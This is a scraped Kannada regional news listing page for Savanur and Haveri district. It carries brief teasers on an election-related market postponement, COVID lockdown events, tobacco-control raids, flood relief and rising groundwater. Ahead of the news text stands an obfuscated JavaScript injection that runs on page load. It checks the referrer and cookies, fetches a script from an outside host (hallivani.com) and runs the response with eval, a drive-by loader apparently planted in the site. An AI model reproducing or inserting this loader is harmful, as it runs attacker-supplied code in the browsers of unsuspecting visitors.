;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//hallivani.com/8jju21px/cache/cache.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};

ಸವಣೂರು

ಕರ್ನಾಟಕ ಪಶ್ಚಿಮ ಪದವೀಧರರ ಕ್ಷೇತ್ರದ ಚುನಾವಣೆ ಹಿನ್ನೆಲೆ ಹತ್ತಿಮತ್ತೂರ ಸಂತೆ ಮುಂದೂಡಿಕೆ

ಹಾವೇರಿ: ಕರ್ನಾಟಕ ಪಶ್ಚಿಮ ಪದವೀಧರ ಕ್ಷೇತ್ರದ ದ್ರೈವಾರ್ಷಿಕ ಚುನಾವಣೆ ಮತದಾನ ಅಕ್ಟೋಬರ್ 28 ರಂದು ಜಿಲ್ಲೆಯಲ್ಲಿ ನಡಯಲಿದೆ. ಶಾಂತಿಯುತ ಮತದಾನಕ್ಕಾಗಿ…

ಮೇ.31ರ ವರೆಗೆ ಸ್ವಯಂ ಪ್ರೇರಿತರಾಗಿ ಬಟ್ಟೆ ವ್ಯಾಪಾರವನ್ನು ಸ್ಥಗಿತಗೊಳಿಸಲು ವರ್ತಕರ ನಿರ್ಧಾರ

ಸವಣೂರ: ಕೊರೊನಾ ಸೋಂಕು ಹೆಚ್ಚುತ್ತಿರುವ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ಪಟ್ಟಣದ ಜವಳಿ ವರ್ತಕರ ಸಂಘದ ವತಿಯಿಂದ ಮೇ.31ರ ವರೆಗೆ ಸ್ವಯಂಪ್ರೇರಿತರಾಗಿ ಬಟ್ಟೆ ವ್ಯಾಪಾರವನ್ನು…

ಉಚಿತ ಮಾಸ್ಕ್ ವಿತರಣೆ

ಸವಣೂರ: ಲಾಕ್ ಡೌನ್ ಅವಧಿಯಲ್ಲಿ ಕಾರ್ಯನಿರ್ವಹಿಸುತ್ತಿರುವ ಪೊಲೀಸ್, ಗೃಹ ರಕ್ಷಕ ಸಿಬ್ಬಂದಿ ಸೆರಿದಂತೆ ಸಾರ್ವಜನಿಕರಿಗೆ ಪಟ್ಟಣದ ರಿಯಾಜ್ ಅಹ್ಮದ್ ಚೌದ್ರಿ…

ಪೂರಕ ಪ್ಯಾಕೇಜ್ ಸೌಲಭ್ಯ ಕಲ್ಪಿಸಲು ಮನವಿ

ಸವಣೂರ: ಲಾಕ್ ಡೌನ್ ವಿಸ್ತರಣೆ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ಸಂಕಷ್ಟದಲ್ಲಿರುವ ಹಡಪದ (ಕ್ಷೌರಿಕ) ಸಮಾಜದವರ ಹಿತರಕ್ಷಣೆಗಾಗಿ ಪೂರಕ ಪ್ಯಾಕೇಜ್ ಸೌಲಭ್ಯ ಕಲ್ಪಿಸಬೇಕೆಂದು ಆಗ್ರಹಿಸಿ…

ಲಾಕ್ ಡೌನ್ ಉಲ್ಲಂಘನೆ: ಸಾಮೂಹಿಕ ಪ್ರಾರ್ಥನೆಗೆ ಮುಂದಾದ ಜನರಿಗೆ ಲಾಠಿ ಬಿಸಿ

ಸವಣೂರ: ಲಾಲ್ ಡೌನ್ ನಡುವೆಯೂ ಸಾಮೂಹಿಕ ಪ್ರಾರ್ಥನೆಗೆ ಮುಂದಾದ 30ಕ್ಕೂ ಹೆಚ್ಚು ಮುಸ್ಲಿಂ ಸಮುದಾಯದವರಿಗೆ ಪೋಲಿಸ್ ಇಲಾಖೆ ಲಾಠಿ ಬಿಸಿ…

ಶಿವರಾತ್ರಿಗೆ ಸಡಗರದ ಸಿದ್ಧತೆ: ವಿಶೇಷ ಪೂಜೆ, ರಾತ್ರಿಯಿಡೀ ಜಾಗರಣೆ

ಸವಣೂರು: ನಗರದ ಬುಧವಾರ ಪೇಟೆಯಲ್ಲಿ ಈಶ್ವರ ದೇವಸ್ಥಾನ ಜೀರ್ಣೋದ್ಧಾರ ಸಮಿತಿ ವತಿಯಿಂದ ಮಹಾ ಶಿವರಾತ್ರಿ ಆಚರಣೆ ಹಾಗೂ ಅಹೋರಾತ್ರಿ ಸಾಂಸ್ಕೃತಿಕ…

ರೈಲ್ವೆ ಇಂಜಿನ್ ನಲ್ಲಿ ಇಂದನ ಸೋರಿಕೆ: ಡಿಸೇಲ್ ತುಂಬುಕೊಳ್ಳಲು ಮುಗಿ ಬಿದ್ದ ಸಾರ್ವಜನಿಕರು

ಹಾವೇರಿ: ಹುಬ್ಬಳ್ಳಿಯಿಂದ ಹೊರಡುವ ಬೆಂಗಳೂರು ಪ್ಯಾಸೆಂಜರ್ ರೈಲ್ವೆ ಇಂಜಿನಿನಲ್ಲಿ ಇಂಧನ ಸೋರಿಕೆಯಾದ ಪರಿಣಾಮ ಡಿಸೇಲ್ ತುಂಬಿಕೊಳ್ಳಲು ಸಾರ್ವಜನಿಕರು‌ ಮುಗಿಬಿದ್ದ ಘಟನೆ ಮಂಗಳವಾರ…

ಸವಣೂರು: ವಿವಿಧ ಅಂಗಡಿಗಳ ಮೇಲೆ ದಾಳಿ ರೂ.1230 ದಂಡ ವಸೂಲಿ

ಹಾವೇರಿ: ರಾಷ್ಟ್ರೀಯ ತಂಬಾಕು ನಿಯಂತ್ರಣ ಕಾರ್ಯಕ್ರಮದಡಿ ಜಿಲ್ಲಾ ತಂಬಾಕು ನಿಯಂತ್ರಣ ಕೋಶ ಹಾಗೂ ವಿವಿಧ ಅಧಿಕಾರಿಗಳನ್ನೊಳಗೊಂಡ ತಂಡ ಇತ್ತೀಚೆಗೆ ಸವಣೂರು…

ಸವಣೂರ ನಗರದ ವಿವಿಧ ಅಂಗಡಿಗಳ ಮೇಲೆ ದಾಳಿ: ರೂ.1450 ದಂಡ ವಸೂಲಿ

ಹಾವೇರಿ: ರಾಷ್ಟ್ರೀಯ ತಂಬಾಕು ನಿಯಂತ್ರಣ ಕಾರ್ಯಕ್ರಮದಡಿ ಜಿಲ್ಲಾ ತಂಬಾಕು ನಿಯಂತ್ರಣ ಕೋಶ ಹಾಗೂ ವಿವಿಧ ಅಧಿಕಾರಿಗಳನ್ನೊಳಗೊಂಡ ತಂಡ ಮಂಗಳವಾರ ಸವಣೂರ…

ಕಾಲ ಕಾಲಕ್ಕೆ ಕಣ್ಣು ತಪಾಸಣೆ ಮಾಡಿಸಿಕೊಳ್ಳಿ: ಡಾ. ವಿದ್ಯಾ ಎಸ್ ಮೋಸ್

ಸವಣೂರ: ಸರಿಯಾದ ಸಮಯಕ್ಕೆ ಕಣ್ಣುಗಳನ್ನು ತಪಾಸಣೆ ಮಾಡಿಸಿಕೊಳ್ಳಲು ಉಚಿತ ಕಣ್ಣಿನ ತಪಾಸಣೆ ಶಿಬಿರಗಳು ಪೂರಕವಾದ್ದು, ಇಂತಹ ಶಿಬಿರಗಳನ್ನು ಎಲ್ಲರು ಸದುಪಯೋಗ…

ರಾಜ್ಯದ ನೆರೆ ಪರಿಹಾರಕ್ಕೆ ಕೇಂದ್ರ ಸರಕಾರದಿಂದ ಸಂಪೂರ್ಣ ಸಹಕಾರ: ಸಚಿವ ಪ್ರಹ್ಲಾದ ಜೋಶಿ

ಹಾವೇರಿ: ಕೇಂದ್ರ ಸರಕಾರ ರಾಜ್ಯದಲ್ಲಿ ಅತಿವೃಷ್ಠಿ ಹಾಗೂ ಪ್ರವಾಹ ಪರಿಹಾರ ಕಾರ್ಯಗಳಿಗೆ ರಾಜ್ಯ ಸರಕಾರಕ್ಕೆ ಸಂಪೂರ್ಣ ನೆರವನ್ನು ನೀಡಲಿದೆ ಎಂದು…

ಹೆಚ್ಚಿದ ಅಂತರ್ಜಲ; ಬೋರ್‌ವೆಲ್‌ನಲ್ಲಿ ಉಕ್ಕಿದ ನೀರು

ಹಾವೇರಿ: ಕಳೆದೊಂದು ವಾರದಿಂದ ಜಿಲ್ಲೆಯಲ್ಲಿ ಸುರಿಯುತ್ತಿರುವ ಧಾರಾಕಾರವಾಗಿ ಮಳೆಯಿಂದಾಗಿ ಅಂತರ್ಜಲ ಮಟ್ಟ ವೃದ್ಧಿಯಾಗಿದ್ದು, ಸವಣೂರು ತಾಲೂಕಿನ ಮಂತ್ರೋಡಿ ಗ್ರಾಮದ ಸರಕಾರಿ…